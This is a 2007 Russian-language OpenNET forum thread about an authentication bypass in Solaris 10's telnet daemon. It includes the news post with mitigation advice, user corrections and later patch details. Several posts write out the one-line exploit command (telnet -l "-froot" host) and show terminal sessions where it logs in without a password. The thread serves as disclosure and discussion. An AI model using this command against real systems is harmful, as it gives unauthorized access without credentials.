The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

форумы  помощь  поиск  регистрация  майллист  ВХОД  слежка  RSS
"OpenNews: Критическая проблема безопасности в telnet сервисе..."
Вариант для распечатки  
Пред. тема | След. тема 
Форумы Разговоры, обсуждение новостей (Public)
Изначальное сообщение [Проследить за развитием треда]

"OpenNews: Критическая проблема безопасности в telnet сервисе..."  
Сообщение от opennews (??) on 13-Фев-07, 14:51 
В стандартном telnet сервисе (in.telnetd) Solaris 10 обнаружена (http://secunia.com/advisories/24120/) уязвимость позволяющая без лишних усилий получить доступ к системе путем комбинации -l и -f опций.


Например, для входа на удаленную систему без пароля под пользователем root достаточно набрать: telnet -l "-froot" host. Суть в передаче аргумента опции "-l" программе login без проверки, login в свою очередь интерпретирует "-f" - как вход без запроса пароля.


Исправление проблемы еще не анонсировано Sun Microsystems, поэтому крайне рекомендуется отключить in.telnetd сервис или заблокировать пакетным фильтром 23 tcp порт.


Примечательно, что в 1994 году идентичная проблема
была найдена (http://osvdb.org/displayvuln.php?osvdb_id=1007) в сервисе rlogin операционной системы AIX.

URL: http://blogs.securiteam.com/index.php/archives/814
Новость: http://www.opennet.ru/opennews/art.shtml?num=9842

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

 Оглавление

Сообщения по теме [Сортировка по времени, UBB]


1. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от dvg_lab email(??) on 13-Фев-07, 14:51 
к вопросу о том кто у кого код слямзил :-)
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

2. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от lomo on 13-Фев-07, 15:34 
Давно так не офигевал от Соляры..
Промышленные, блин, системы...

(from linux server to solaris 10 x86 U3 + patches)

$ telnet -l"-fjimb" sol10
Trying 10.10.14.3...
Connected to sol10.
Escape character is '^]'.
Last login: Mon Feb 12 12:05:20 from rhel4es-sb
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
[jimb@sol10(pts/1) ~]$

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

25. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от alk (??) on 14-Фев-07, 11:10 
что то я не понимаю ... у меня такой номер не прошел
[root@main:/] #telnet -l"froot" 10.0.0.2
Trying 10.0.0.2...
Connected to 10.0.0.2.
Escape character is '^]'.


SunOS 5.10

Password:

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

26. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от Аноним on 14-Фев-07, 11:56 
telnet -l "-froot" 10.0.0.2
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

28. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от alk (??) on 14-Фев-07, 14:49 
Мда.... нехило
[root@main:/] #telnet -l"falk" 10.0.0.2
Trying 10.0.0.2...
Connected to 10.0.0.2.
Escape character is '^]'.

SunOS 5.10

Sourcing //.profile-EIS.....
alk@cnr1 # uname -a
SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

31. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от мимоход on 17-Фев-07, 19:36 
что-то у меня работает только на десятке, и то не под рутом, на девятке - нет.

>Мда.... нехило
>[root@main:/] #telnet -l"falk" 10.0.0.2
>Trying 10.0.0.2...
>Connected to 10.0.0.2.
>Escape character is '^]'.
>
>SunOS 5.10
>
>Sourcing //.profile-EIS.....
>alk@cnr1 # uname -a
>SunOS cnr1 5.10 Generic sun4u sparc SUNW,Sun-Fire-V210


Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

30. "Давно так не офигевал от Соляры.."  
Сообщение от Квагга on 14-Фев-07, 22:13 
А Соляра другой, простите, ни одного дня не была.

Вот уже с 95-го на моей памяти все дыры в ней были строго ГОМЕРИЧЕСКОГО масштаба.

Отродясь это было визиткой Соляры.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

3. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от Андрей email(??) on 13-Фев-07, 15:57 
Нормальные люди отключают телнет ( по крайней мере для доступа из инета и др. небезопасных сетей )
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

5. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от mike_t on 13-Фев-07, 15:59 
telnets тоже не использовать?
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

4. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от Advanced Аноним on 13-Фев-07, 15:59 
я уверен что число машин с включённым telnetd мизерно, так что, хоть сам факт такой глупой ошибки и вызывает непонятные чувства, но никак не подрывает авторитет Solaris...
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

6. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от Advanced Аноним on 13-Фев-07, 15:59 
Кстати, в адвойзари ошибка, под рутом в дефолтной инсталляции нельзя зайти. Только под каким-нибудь другим юзером.
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

7. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от ABorland email on 13-Фев-07, 16:19 
Неужели кто то еще пользуется телнетом?
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

8. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от lionGAD on 13-Фев-07, 16:51 
конечно..
например у меня вся безопасность лежит на плечах цысок и внутри сети серверы максимально разгружены и бегают по телнету и rsh к друг другу в гости..
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

9. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от Dmitry (??) on 13-Фев-07, 17:06 
че правда и внутри телнет руту открыт ?
ну вы отважный перец :-)
хотя бы защиту от дурака предусмотрели, а то у нас один клоун вместо
контроллера сам домен на Sun Fire так вот ребутнул по ошибке, так сразу
все по-нормальному вывели ......
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

11. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от lionGAD on 13-Фев-07, 17:17 
> че правда и внутри телнет руту открыт ?
>ну вы отважный перец :-)
>хотя бы защиту от дурака предусмотрели, а то у нас один клоун вместо
>контроллера сам домен на Sun Fire так вот ребутнул по ошибке, так сразу
>все по-нормальному вывели ......
у меня в сети дураков нету.. не та сеть, не те задачи... просто я привёл пример что телнет всё таки нужен
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

14. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от Pavel (??) on 13-Фев-07, 17:54 
Дураки есть везде, в том числе и на этом сайте в постах
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

17. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от emp (??) on 13-Фев-07, 19:03 
у нормальных админов все эти телнеты и рсаши бегают в отдельном влане.
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

10. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от iptables (??) on 13-Фев-07, 17:12 
Ну и ну, телнет действительно не актуален, но проблемма есть. Что касается удалённого входа, то не думаю, что админ оставит открытым телнет для инета, ибо это уже не админ...
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

12. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от Хомяк on 13-Фев-07, 17:21 
Да Солярку в Сеть вообще лучше не выставлять :-)))
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

13. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от adil_18 email(??) on 13-Фев-07, 17:33 
да уж
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

15. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от Oles email on 13-Фев-07, 17:55 
Промышленная система ;)
SunOS 5.10 Generic_118855-14 i86pc i386 i86pc
df -h показывает
/dev/md/dsk/d50        825G 16384E   1.2T 2152924666864% /somemount
df -k показывает
/dev/md/dsk/d50      865477325 18446744073261050460 1305323708 2152924666864% /somemount
эх, бардак...
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

16. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от L.Torvalds on 13-Фев-07, 18:44 
Ну чего раскудахтались? Ошибки у всех бывают :) Хотя конечно неприято ...
По делу надо добавить:
- подвержены _только_ Solaris 10. Старые соляры все держат пучком :)
- root'ом не зайдешь. Можно только юзером. Утешение слабое, но на безрыбьи ...

Самое паскудное - патча нет. Второй день пошел. Для тех кому telnet таки нужен, очень "горячий" второй fu*ng день :-/

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

18. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от Аноним on 13-Фев-07, 19:21 
а на Sol9 sun не работает это
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

19. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от morph email(??) on 13-Фев-07, 20:03 
телнет к сожалению остался на еще момедах, коммутаторах и прочей лабуде. Интересно, неужели sshd на сервере хавает ресурсов больше? Вернее...неверно вопрос задал - в масштабе производительности хорошего сервера (даже на x86) будет заметна разница?
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

21. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от гость on 13-Фев-07, 21:40 
Если железо не на помойке подобрано, то ничего заметно не будет при условии что количество сессий и объем трафика в них не выражаются 4х значными числами.
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

20. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от fi on 13-Фев-07, 21:39 
Многие проги под виндоус исторически заточены работать с сервером без ssh.  Конечно, все внутри, но где гарантия , что изнутри нет желающих.

Более того, когда у нас админы опечаленные положением дел, без предупреждения закрыли сервисы (telnet и rexec) - народ взвыл! открыли в тот же вечер - переконфигурировать всех клиентов было не реально :))))

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

22. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от Аноним on 13-Фев-07, 23:59 
Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим telnet, на рутера и сервера - ssh only.
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

23. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от ламусанонимус on 14-Фев-07, 00:09 
>Грамотный подход, Control VLAN и access lists. Покрайней мере на коммутаторы ходим
>telnet, на рутера и сервера - ssh only.
Напоминает виндузевый подход - если с фаерволом, антивирусом и браузер не IE использовать то даже вроде и не очень дырявая система получается :)
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

24. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от Аноним on 14-Фев-07, 07:51 
Да лан, что никто не помнит дыру в том же телнете под четвертой фряхой ?
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

29. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от FSA (??) on 14-Фев-07, 21:45 
Сколько себя помню, а начинал с FreeBSD 4.x, ни разу не пользовался телнетом... В голову просто не приходило, SSH хватает.
Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

27. "Критическая проблема безопасности в telnet сервисе Solaris"  
Сообщение от Аноним on 14-Фев-07, 12:15 
ISR (Interim Security Relief) patches are now available for the Solaris 10
in.telnetd vulnerability from http://sunsolve.sun.com/tpatches

The Descriptions and readme links are currently empty, but they should be there
shortly.

The ISR's are :

IDR125456-01.zip  -  Solaris 10 SPARC
IDR125457-01.zip  -  Solaris 10 x86

Patch 120068-01 (SPARC) or 120069-01 (x86) are required patches, however none of
these patches/ISR's require a reboot and they will take effect immediately.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Индекс форумов | Темы | Пред. тема | След. тема
Оцените тред (1=ужас, 5=супер)? [ 1 | 2 | 3 | 4 | 5 ] [Рекомендовать для помещения в FAQ]




Спонсоры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2022 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру